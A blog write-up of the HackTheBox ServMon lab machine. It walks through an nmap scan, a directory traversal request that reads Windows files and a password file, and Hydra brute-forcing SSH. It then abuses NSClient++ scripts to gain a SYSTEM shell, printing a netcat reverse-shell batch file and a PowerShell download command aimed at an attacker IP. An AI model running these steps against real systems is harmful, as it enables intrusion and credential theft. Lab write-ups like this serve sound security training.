HackTheBox ServMon Writeup – 10.10.10.184

HackTheBox ServMon (10.10.10.184) is a simple and easy machine with TVT NVMS-1000 Exploit devices that allows attackers to perform Directory Traversal attack on the vulnerable devices and the associated system. In today’s ServMon Writeup I’m going perform the one of the known CVE (CVE-2019-20085) to gain initial foothold and perform the further attack to gain system access using another vulnerable service installed in the system (NSClient++).

Difficulty: Easy

Enumeration

As always, I add the machine IP 10.10.10.184 to hosts file as srevmon.htb for easiness and proceed with the NMAP scanning.

NMAP Result

# root @ ns09 in ~/htb/servmon [12:30:05] 
$ nmap -T4 -A -sV -sS servmon.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 12:30 +03
Stats: 0:02:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 95.49% done; ETC: 12:32 (0:00:00 remaining)
Nmap scan report for servmon.htb (10.10.10.184)
Host is up (0.12s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|_    Sat:Saturday
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=4/16%Time=5E9825AE%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/16%Time=5E9825B7%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\0s\
SF:0d\0a\0y\0:\0T\0h\0u\0:\0T\0h\0u\0r\0s\0")%r(HTTPOptions,36,"HTTP/1\.1\
SF:x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(Fou
SF:rOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDoc
SF:ument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-L
SF:ength:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,36,"HTTP/1\
SF:.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/16%OT=21%CT=1%CU=30447%PV=Y%DS=2%DC=T%G=Y%TM=5E98263
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10F%TI=I%CI=I%TS=U)SEQ(SP=1
OS:06%GCD=1%ISR=10F%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NN
OS:S%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%
OS:W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC
OS:=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF
OS:=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m45s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-16T09:35:17
|_  start_date: N/A

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   123.30 ms 10.10.14.1
2   123.70 ms servmon.htb (10.10.10.184)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.67 seconds

# root @ ns09 in ~/htb/servmon [12:32:39] 
$ 

The NMAP scan shows a few open ports. There is an FTP running with Anonymous FTP login allowed, I went ahead to check it first.

The FTP contains a directory “users” where “Nadine” and “Nathan” directories resides. Inside Nadine directory there is a text file “Confidential.txt” and Nathan has a file “Notes to do.txt”. Both files read as below:

So, as per the Nadine’s notes there is a file with “Passwords” in Nathan’s desktop and as per Nathan’s to-do list, NVMS passwords has been changed, NSClient access has been locked but password upload not done, NVMS public access not removed, secret files are not uploaded to SharePoint.

I started to enumerate more using the open ports.

The web server port 80 shows a login page of NVMS-1000 NVR. This is the same device Nathan didn’t block the access.

A quick Google search showed me that the particular models of “NVMS 1000” NVRs are vulnerable to Directory Traversal attacks. Exploit: https://www.exploit-db.com/exploits/47774

Directory Traversal Attack Using Burp Suite

I intercept the request using Burp and add the directory traversal attack using following HTTP request.

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1

From the repeater I was able to read win.ini file which resides inside the secure Windows folder.

The next is reading the Password.txt file Nadine left in Nathan’s desktop. I tried with folloiwng :

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1

And yes, I have the passwords stored in Nathan’s desktop

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

I have the Passwords but not sure who is belongs to. So a simple way to confirm is Hydra Login Cracker. While, hydra needs wordlist to brute force, I used the list of Passwords and the two users Nadine and Nathan as users. I know the SSH is running, so I decided to run SSH as a service to test and I got the password cracked within seconds.

SSH Credential:

nadine:L1k3B1gBut7s@W0rk

I SSH the box using user Nadine and grab the User.txt from Nadine’s desktop.

Exploiting NSClient++ Service and Privilege Escalation

As we already know from NMAP scan there is a NSClient++ is running on the port 8443. Upon visiting on https://10.10.184:8443, I found the following webapp.

I wasn’t able to perform anything on the web app, so back to Google and found another exploit that reveals the application Administrator’s password stored in the clear text format. WT*!!!. The exploit’s prerequisite is to have access to the system and the attack only be performed locally. I already logged-in to the system as Nadine so this should be easy.

Obtaining Admin password:

As I mentioned above the exploit can be done through localhost (127.0.0.1). Using SSH we can route the traffic to the local port. A simple command will do that.

ssh nadine@10.10.10.184 -L 8888:127.0.0.1:8443

  • My local port is 8888
  • And the application running on localhost 127.0.0.1:8443

I run this command from another terminal and got logged-in as Nadine, and from my browser I browsed the web app https://127.0.0.1:8443 and bingo, I have the webpage opened.

I used the admin password obtained earlier (ew2x6SsGTxjRwXOT) to login the app.

The exploit needs two files. nc.exe and Evil.bat. The Evil.bat is just a batch file with a couple of lines of code to execute the reverse shell. I used PythonSimpleHTTP server to upload these two files.

Evil.bat file:

@echo off
c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe

Downloading Files in the ServMon machine using PowerShell

powershell.exe wget "http://10.10.14.13:8899/nav1n.bat" -outfile "c:\Temp\nav1n.bat"

I start my listener on another terminal

Adding script foobar to call evil.bat

I head back to the webpage running on the 127.0.01:8888 and Settings -> Scripts -> + Add new

Adding scheduler to call script every minute

Restart the application

From the right-top I clicked on the Control and from drop-down menu, clicked Reload to restart the application. This event will initiate the command I added in the external scripts. .

Reverse Shell As System

I have the reverse shell as System in my listener, I immediately grab the root.txt.

That’s all folks, thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.